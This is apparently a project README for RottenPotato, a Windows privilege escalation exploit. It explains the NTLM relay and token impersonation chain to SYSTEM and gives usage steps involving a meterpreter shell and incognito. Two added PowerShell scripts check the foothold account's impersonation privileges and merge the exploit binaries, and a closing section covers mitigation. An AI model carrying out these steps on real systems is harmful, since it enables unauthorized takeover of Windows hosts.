RottenPotato – Local Privilege Escalation from Windows Service Accounts to SYSTEM
The idea behind this vulnerability is simple to describe at a high level:
- Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control (RottenPotato does this by coaxing DCOM into connecting to a listener on the local machine).
- Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls; the relayed NTLM messages end up in AcceptSecurityContext, which hands back the SYSTEM token.
- Impersonate the token we have just negotiated. This can only be done if the attacker's current account holds a token-impersonation privilege (SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege). This is usually true of most service accounts and not true of most user-level accounts.
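Before running the exploit it is worth confirming that the foothold account really does hold one of those privileges. The following PowerShell is an added example, not part of the RottenPotato project; it assumes the English-locale column names that `whoami /priv /fo csv` produces:

```powershell
# Added example, not part of the RottenPotato project: confirm that the
# foothold account actually holds a token-impersonation privilege before
# bothering with the exploit. Run this in the shell you obtained on the target.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
"Running as: $($identity.Name)"

# whoami /priv lists every privilege present on the current token, whether it
# is currently Enabled or Disabled. RottenPotato needs one of these two.
# "Disabled" still means the privilege is on the token (it can be switched on
# with AdjustTokenPrivileges); a privilege that is absent cannot be added.
$needed = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
$privs  = whoami /priv /fo csv | ConvertFrom-Csv   # columns assumed: Privilege Name, Description, State

$usable = $false
foreach ($name in $needed) {
    $row = $privs | Where-Object { $_.'Privilege Name' -eq $name }
    if ($null -eq $row) {
        '{0,-30} not present on this token' -f $name
    } else {
        '{0,-30} {1}' -f $name, $row.State
        $usable = $true
    }
}

if ($usable) {
    'Token impersonation is available: RottenPotato should apply to this account.'
} else {
    'No impersonation privilege: this account is not a RottenPotato candidate.'
}
```

If neither privilege is listed, the relay will still succeed but the final impersonation step will fail, so there is no point running the binary from that account.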
Usage:
- Compile.
- Use ILMerge to combine Potato.exe, SharpCifs.dll, NHttp.dll, and Microsoft.VisualStudio.OLE.Interop.dll. This will produce a single, portable binary.
- Get a meterpreter shell on the target system.
- use incognito
- Run the binary from step 2.
- impersonate_token “NT AUTHORITY\SYSTEM”
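Step 2 written out as a build script, added here as an example and not part of the RottenPotato repository. The ILMerge location, the build output directory and the merged file name are assumptions; ILMerge takes the entry point from the first (primary) assembly, so Potato.exe must come first:

```powershell
# Added example, not part of the RottenPotato repository: step 2 of the usage
# list as a script. The paths below are assumptions; adjust them to your build
# output and ILMerge install location.
$ilmerge = 'C:\Tools\ILMerge\ILMerge.exe'
$build   = '.\Potato\bin\Release'
$out     = Join-Path $build 'RottenPotato.exe'

# Primary assembly first: ILMerge uses its entry point for the merged binary.
$inputs = @(
    'Potato.exe',
    'SharpCifs.dll',
    'NHttp.dll',
    'Microsoft.VisualStudio.OLE.Interop.dll'
) | ForEach-Object { Join-Path $build $_ }

# Fail early if the compile step did not produce every assembly we need.
$missing = $inputs | Where-Object { -not (Test-Path $_) }
if ($missing) { throw "Missing build outputs:`n$($missing -join "`n")" }

& $ilmerge "/out:$out" @inputs
if ($LASTEXITCODE -ne 0) { throw "ILMerge failed with exit code $LASTEXITCODE" }

"Merged binary: $out"
```

The resulting single executable is what gets uploaded and run from the meterpreter session in the steps above.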
Demo
Rotten Potato – MSSQL Privilege Escalation
Rotten Potato – IIS Privilege Escalation
For a technical overview of this exploit see our blog post here.
Mitigation: the whole chain hinges on the compromised service account holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so privileged account management is the relevant control: inventory which accounts hold those privileges, treat any account that does as effectively SYSTEM-equivalent when threat modelling a host, and monitor service accounts for unexpected child processes running as NT AUTHORITY\SYSTEM. The technique also illustrates the difference between authentication and authorization: the relayed NTLM exchange is a genuine, successful authentication of SYSTEM; what turns it into an escalation is the authorization the attacker's account already has to impersonate the resulting token. Cyber insurance can cover incident response, legal and liability costs after such an abuse, but it does nothing to reduce the likelihood of it, so it complements rather than replaces the controls above.